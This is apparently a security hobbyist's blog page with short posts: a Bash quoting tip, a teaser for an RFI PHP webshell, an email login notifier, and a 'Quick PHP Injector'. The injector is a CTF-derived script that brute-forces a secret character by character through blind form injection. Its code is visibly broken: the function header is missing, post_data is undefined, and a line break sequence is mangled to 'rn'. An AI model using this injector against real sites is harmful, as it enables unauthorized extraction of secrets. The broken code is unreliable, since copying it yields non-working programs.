TILFH: Quotes and When to Use Them

One thing that always confuses me when I’m writing Bash scripts is what type of quote to use in a given situation. Luckily, Hermit schooled me with this quick rundown:

“SOMETHING” = This means evaluate what’s between the quotes.

‘SOMETHING’ = This means don’t evaluate what’s between the quotes. This is a literal string.

`SOMETHING`= This means execute the stuff between the quotes and spit out the result. NOTE: These little back quotes are hard to find. Look on the tilde key.

$(SOMETHING) = Same as above.

– Killswitch

RFI PHP Webshell Injector

Sometimes you just need a quick PHP webshell to complement your RFI vulnerability you’ve uncovered.  There are plenty of “fancy” ones with lots of features, but I prefer simple, effective, command-line equivalent access any day.  If you’re of that persuasion as well, just use this as the target of your RFI to give yourself Hermit’s Stupidly Simple WebShell (HSSWS).  Enjoy!

Continue reading “RFI PHP Webshell Injector”

Linux Login Notifier

Here’s a quick script I wrote some years ago to notify me when an interactive session is being launched from one of my servers. Feel free to modify/use however you see fit. Thanks!

#!/bin/bash
# Place this in /etc/profile.d/whatever-name-you-like.sh
NOTIFYADDRRESS="your_email_address"
FROMADDRESS="sending_email_address"
THESYSTEM=`hostname`
THATUSER=`awk -v USER=$UID -F : '$3 == USER {print $1}' /etc/passwd`
CURTIME=`date --rfc-3339=ns`
echo "Login from ${THATUSER} (${UID}) on ${CURTIME}" | mail -aFrom:${FROMADDRESS} -s "${THATUSER} just logged into ${THESYSTEM}" -r ${FROMADDRESS} ${NOTIFYADDRESS}

It just fires off an email whenvever an interactive session is started.

Quick PHP Injector

Just posting this for anyone that may need something similar in the future.  The below is my quick code that I use to brute force/programmatically assess form injection.  I wrote it when working through (CTF NAME REDACTED).  If it helps, enjoy.  Please attribute appropriately if you repurpose it, however.

// Name: PHP-Injector-Template
// Author: Brian Mork (Hermit)
// Last Modified: 2016-04-08

// This version assumes basic authentication and POST method
$options = array(
     'http' => array(
          'header' => "Content-type: application/x-www-form-urlencodedrnAuthorization: Basic " . base64_encode("$leveluser:$levelpass"),
          'method' => 'POST',
          'content' => http_build_query($testpush)
     )
);

// Build the context for the request using all of the above
$context = stream_context_create($options);

// Actually submit it
$result = file_get_contents($url, false, $context);

// Check for a failed connection state (just in case)
if ($result === FALSE) {
     print "Failed to connect\n\n";
} else {
// Look for "INDICATOR" which indicates successful injection and return based upon that...
     if (preg_match("/INDICATOR/", $result)) {
          return $trialdata;
     } else {
          return null;
     }
}

// Zeroize the recovery key
$recoverkey = '';

// Build an array which is [A-Za-z0-9]
// Modify as appropriate for other use cases
$allchars = array_merge(range('A', 'Z'), range('a', 'z'), range(0, 9));

// List how many characters to limit the search to
$loopcount = 123;
// Loop through and test
foreach ( range(1, $loopcount) as $looper ) {
     $breakflag = 'FALSE';
     foreach( $allchars as $onechar) {
          // Bypass method to avoid unnecessary tries
          if ($breakflag === 'FALSE') {
               // We need to track the single character separately from the injection test
               // so the below builds the test portion
               $testkey = $recoverkey . $onechar;
               // Check it using the above function
               $poscheck = post_data($testkey);
               // If we didn't get null, it was good... let me know!
               if ($poscheck !== null) {
                    $breakflag = 'TRUE';
                    $recoverkey .= $onechar;
                    echo "\nFound new position! Current recovery is: " . $recoverkey . "\n";
               } else {
                    // I just like to see that it's still working
                    echo ".";
               }
          }
     }
}

// Once we've reached the full number of characters, break and print the key
print "Found key of: " . $recoverkey . "\n\n";
?>

 

Create a website or blog at WordPress.com

Up ↑